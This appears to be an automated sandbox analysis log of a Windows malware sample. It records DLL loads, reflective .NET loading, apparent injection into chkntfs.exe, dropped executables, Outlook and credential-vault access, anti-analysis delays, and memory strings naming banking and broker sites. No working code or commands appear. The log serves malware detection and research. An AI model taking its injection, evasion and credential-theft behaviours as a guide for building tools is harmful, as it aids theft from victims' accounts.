              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: version.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: dwrite.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: windowscodecs.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: ulib.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: ifsutil.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: devobj.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: mlang.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: edputil.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: appresolver.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: bcp47langs.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: slc.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: sppc.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: apphelp.dll
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe Section loaded: wininet.dll
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe Section loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe Section loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: dwrite.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: msasn1.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: gpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Section loaded: windowscodecs.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Windows\SysWOW64\chkntfs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
              Source: 8hd98EhtIFcYkb8.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: 8hd98EhtIFcYkb8.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: XOyN.pdb source: EuOdzX7Ehz6t1H3[1].exe.14.dr, aj34fjqh.exe.14.dr
              Source: Binary string: chkntfs.pdbGCTL source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431730936.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000003.1370660862.000000000067B000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3701797109.0000000000668000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357259966.000000000055E000.00000002.00000001.01000000.0000000D.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3691801922.000000000055E000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: wntdll.pdbUGP source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1431710177.0000000004448000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1433783281.00000000045FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: 8hd98EhtIFcYkb8.exe, 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 0000000E.00000003.1431710177.0000000004448000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1433783281.00000000045FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: chkntfs.pdb source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431730936.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000003.1370660862.000000000067B000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3701797109.0000000000668000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: XOyN.pdbSHA256 source: EuOdzX7Ehz6t1H3[1].exe.14.dr, aj34fjqh.exe.14.dr

              Data Obfuscation

              Source: 8hd98EhtIFcYkb8.exe, OptionsWindow.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.cs .Net Code: gts9qQpZDK System.Reflection.Assembly.Load(byte[])
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.cs .Net Code: gts9qQpZDK System.Reflection.Assembly.Load(byte[])
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.cs .Net Code: gts9qQpZDK System.Reflection.Assembly.Load(byte[])
              Source: 14.2.chkntfs.exe.4dccd08.2.raw.unpack, OptionsWindow.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 16.0.xQUrWfQeELsQZII.exe.341cd08.1.raw.unpack, OptionsWindow.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 16.2.xQUrWfQeELsQZII.exe.341cd08.1.raw.unpack, OptionsWindow.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: EuOdzX7Ehz6t1H3[1].exe.14.dr Static PE information: 0x82EF2085 [Thu Aug 11 21:05:09 2039 UTC]
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 0_2_00DBBE50 push ebp; retn 5504h0_2_00DBC03E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 0_2_00DBB43B push ss; ret 0_2_00DBB442
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00405059 pushad ; iretd 3_2_00405071
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0041688F pushad ; retf 3_2_004168B1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_004231F3 push edx; ret 3_2_00423232
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00401A04 push ecx; ret 3_2_00401A0E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00416213 push esi; iretd 3_2_0041621E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0040D2B8 push edx; iretd 3_2_0040D2BA
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00418B81 pushad ; iretd 3_2_00418BB3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00418B92 pushad ; iretd 3_2_00418BB3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00412435 push ds; iretd 3_2_00412439
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00414436 push edi; iretd 3_2_00414437
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00403570 push eax; ret 3_2_00403572
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0040CDC6 push es; retf 3_2_0040CDC7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00418EFD push ecx; retf 3_2_00418F05
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_004086BC push ss; retf 3_2_004086CA
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0041A72F push esi; iretd 3_2_0041A737
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0041A733 push esi; iretd 3_2_0041A737
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00408787 push 0000004Fh; ret 3_2_004087AC
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0127225F pushad ; ret 3_2_012727F9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012727FA pushad ; ret 3_2_012727F9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A09AD push ecx; mov dword ptr [esp], ecx3_2_012A09B6
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0127283D push eax; iretd 3_2_01272858
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01271368 push eax; iretd 3_2_01271369
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047A27FA pushad ; ret 14_2_047A27F9
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047A225F pushad ; ret 14_2_047A27F9
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047A283D push eax; iretd 14_2_047A2858
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047D09AD push ecx; mov dword ptr [esp], ecx14_2_047D09B6
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005A2CA0 push esi; iretd 14_2_005A2CAB
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005A0EC3 push edi; iretd 14_2_005A0EC4
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0059EEC2 push ds; iretd 14_2_0059EEC6
              Source: 8hd98EhtIFcYkb8.exe Static PE information: section name: .text entropy: 7.968066969388496
              Source: EuOdzX7Ehz6t1H3[1].exe.14.dr Static PE information: section name: .text entropy: 7.917870067906471
              Source: aj34fjqh.exe.14.dr Static PE information: section name: .text entropy: 7.917870067906471
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, oM1ONZzUFLWJVwrBmD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'l8a5iVG0jC', 'Ypp5w0hSYu', 'BfJ5ZarlSI', 'jT65MBSGug', 'Eif5Qn0LMQ', 'tFR55tvRPs', 'HJm5InX1p7'
              Source: C:\Windows\SysWOW64\chkntfs.exe File created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe
              Source: C:\Windows\SysWOW64\chkntfs.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EuOdzX7Ehz6t1H3[1].exe
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\chkntfs.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\chkntfs.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: Yara match File source: Process Memory Space: aj34fjqh.exe PID: 6180, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFB2CECD324
              Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFB2CECD7E4
              Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFB2CECD944
              Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFB2CECD504
              Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFB2CECD544
              Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFB2CECD1E4
              Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFB2CED0154
              Source: C:\Windows\SysWOW64\chkntfs.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Memory allocated: D50000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Memory allocated: 2730000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Memory allocated: 2680000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Memory allocated: 7380000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Memory allocated: 8380000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Memory allocated: 8620000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Memory allocated: 9620000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Memory allocated: 1760000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Memory allocated: 3150000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Memory allocated: 2F60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Memory allocated: 8720000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Memory allocated: 9720000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Memory allocated: 98F0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Memory allocated: A8F0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Code function: 3_2_012E096E rdtsc
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Thread delayed: delay time: 240000
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Thread delayed: delay time: 239874
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Thread delayed: delay time: 239765
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\chkntfs.exe Window / User API: threadDelayed 9823
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Window / User API: threadDelayed 912
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe API coverage: 0.7 %
              Source: C:\Windows\SysWOW64\chkntfs.exe API coverage: 2.6 %
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe TID: 5896 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7836 Thread sleep count: 149 > 30
              Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7836 Thread sleep time: -298000s >= -30000s
              Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7836 Thread sleep count: 9823 > 30
              Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7836 Thread sleep time: -19646000s >= -30000s
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880 Thread sleep time: -75000s >= -30000s
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880 Thread sleep count: 39 > 30
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880 Thread sleep time: -39000s >= -30000s
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880 Thread sleep count: 31 > 30
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe TID: 7880 Thread sleep time: -46500s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 3492 Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 3492 Thread sleep time: -240000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 3492 Thread sleep time: -239874s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 3492 Thread sleep time: -239765s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 2376 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe TID: 7716 Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\chkntfs.exe Code function: 14_2_005ABE80 FindFirstFileW,FindNextFileW,FindClose
              Source: j77tfG6.14.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: j77tfG6.14.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: j77tfG6.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: j77tfG6.14.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: j77tfG6.14.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: j77tfG6.14.dr Binary or memory string: outlook.office.comVMware20,11696492231s
              Source: j77tfG6.14.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: j77tfG6.14.dr Binary or memory string: AMC password management pageVMware20,11696492231
              Source: j77tfG6.14.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
              Source: j77tfG6.14.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: chkntfs.exe, 0000000E.00000002.3694875633.00000000029E8000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3709837557.00000000079D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: j77tfG6.14.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: j77tfG6.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: j77tfG6.14.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: j77tfG6.14.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
              Source: j77tfG6.14.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: j77tfG6.14.dr Binary or memory string: discord.comVMware20,11696492231f
              Source: firefox.exe, 00000012.00000002.1724397618.000002B134CBC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: j77tfG6.14.dr Binary or memory string: global block list test formVMware20,11696492231
              Source: j77tfG6.14.dr Binary or memory string: dev.azure.comVMware20,11696492231j
              Source: j77tfG6.14.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: j77tfG6.14.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
